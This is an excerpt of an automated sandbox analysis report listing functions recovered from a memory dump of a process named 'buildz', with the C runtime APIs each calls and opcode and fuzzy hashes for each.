                          • __get_sys_err_msg.LIBCMT ref: 023C676D
                          • __invoke_watson.LIBCMT ref: 023C678B
                          Memory Dump Source
                          • Source File: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_2300000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                          • String ID:
                          • API String ID: 4066021419-0
                          • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                          • Instruction ID: dd3b70f504533e06d8dcd945d8829adc4a78f8a8b230746b916ad08659f7f580
                          • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                          • Instruction Fuzzy Hash: A61194716016247BEB357A259C42BBE739DDF80764F60087AFE08A6641EB22DD144FE4
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_2300000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memset
                          • String ID: D
                          • API String ID: 2102423945-2746444292
                          • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                          • Instruction ID: 33d2e3f439af76a997b9c09651a80dec522b3d043db98ee5b7439ff2f070a6e5
                          • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                          • Instruction Fuzzy Hash: A6E14D71D00229ABDF28DFA0DD49FEFB7B9BF04304F144169E909A6190EB746A45CF54
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_2300000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memset
                          • String ID: $$$(
                          • API String ID: 2102423945-3551151888
                          • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                          • Instruction ID: 34531db56305279564ecf6bf0cf418cbc52652023c1f79d91c8c76e0c6a12ab3
                          • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                          • Instruction Fuzzy Hash: C6918971D0021CAAEF21CBA0C8A9BEEBBF5AF05308F244169D505772C1DBB65A48CF65
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_2300000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _wcsnlen
                          • String ID: U
                          • API String ID: 3628947076-3372436214
                          • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                          • Instruction ID: e99bf9344e0685675268f18a5507e0ee23a19a429dba91c98e1cdd6c60b1bd4e
                          • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                          • Instruction Fuzzy Hash: A4212B72214328BAEB14DAA49C45BBE73DDDB45761F904165F908CA190FB70EB488AA4
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_2300000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memset
                          • String ID: p2Q
                          • API String ID: 2102423945-1521255505
                          • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                          • Instruction ID: d4f79d5fa830682842a3597644189ab7ec2b435b6bece06b24aad060845a3943
                          • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                          • Instruction Fuzzy Hash: 94F0E578694790A5F7217B50BC267857E927B31B08F504045D1142E2E1D3FD234C6799
                          APIs
                          • std::exception::exception.LIBCMT ref: 0234FBF1
                            • Part of subcall function 0233169C: std::exception::_Copy_str.LIBCMT ref: 023316B5
                          • __CxxThrowException@8.LIBCMT ref: 0234FC06
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_2300000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                          • String ID: TeM$TeM
                          • API String ID: 3662862379-3870166017
                          • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                          • Instruction ID: a87e8dbffd160260ab6d14e261a4983ff313b72874c6c17503ebf9f2f04752e8
                          • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                          • Instruction Fuzzy Hash: 56D06775D0020CBBCB01EFA5D459CDDBBB9AA04344B008466AD5897241EA74A3498F98
                          APIs
                            • Part of subcall function 0232197D: __wfsopen.LIBCMT ref: 02321988
                          • _fgetws.LIBCMT ref: 0230D15C
                          Memory Dump Source
                          • Source File: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_2300000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: __wfsopen_fgetws
                          • String ID:
                          • API String ID: 853134316-0
                          • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                          • Instruction ID: c300f2ef605026b0ec50db471fc133fe276bc02746b73d11a62c09a4500d7376
                          • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                          • Instruction Fuzzy Hash: 2391B172D10319ABCF20DFA4CD947AEB7F9EF04314F140569E815A3280E776EA18CBA5
                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_2300000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _malloc$__except_handler4_fprintf
                          • String ID:
                          • API String ID: 1783060780-0
                          • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                          • Instruction ID: c19c6b3862bf4101e63c3f5273690e69ca6095fdaad35a206ace5c680db96f92
                          • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                          • Instruction Fuzzy Hash: 47A13DB1C0025CABEF21EFE4CC55BDEBBB6AF14304F140128D90576291E7B65A48CFA6
                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_2300000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                          • String ID:
                          • API String ID: 2974526305-0
                          • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                          • Instruction ID: e075e2acd83d4c60617ffa330687c7bbcd85379060195b1348c970a98525d97f
                          • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                          • Instruction Fuzzy Hash: A5519270A003359BDB298F798C846AFB7B6AF40324F148729FC75966D0D7719A59CB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_2300000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                          • String ID:
                          • API String ID: 3016257755-0
                          • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                          • Instruction ID: 33921bfde1819ba1204c49dbf77b197c9122e064bea4de7fe88d60192b016846
                          • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                          • Instruction Fuzzy Hash: AB014E3244054EBBCF225E84DD01CED3FA7BB19358F488495FA9D58930DB36E5B1AB81
                          APIs
                          • ___BuildCatchObject.LIBCMT ref: 023C7A4B
                            • Part of subcall function 023C8140: ___BuildCatchObjectHelper.LIBCMT ref: 023C8172
                            • Part of subcall function 023C8140: ___AdjustPointer.LIBCMT ref: 023C8189
                          • _UnwindNestedFrames.LIBCMT ref: 023C7A62
                          • ___FrameUnwindToState.LIBCMT ref: 023C7A74
                          • CallCatchBlock.LIBCMT ref: 023C7A98
                          Memory Dump Source
                          • Source File: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_2300000_buildz.jbxd
                          Yara matches
                          Similarity
                          • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                          • String ID:
                          • API String ID: 2901542994-0
                          • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                          • Instruction ID: 3e536edb1a9875b9e50d3898aaceeec8821fe5d45414ba64164506fa25a17f18
                          • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                          • Instruction Fuzzy Hash: A201E936100109BBCF22AF55CC01EEA7BBAFF88754F258018FE1865221D732E961DFA0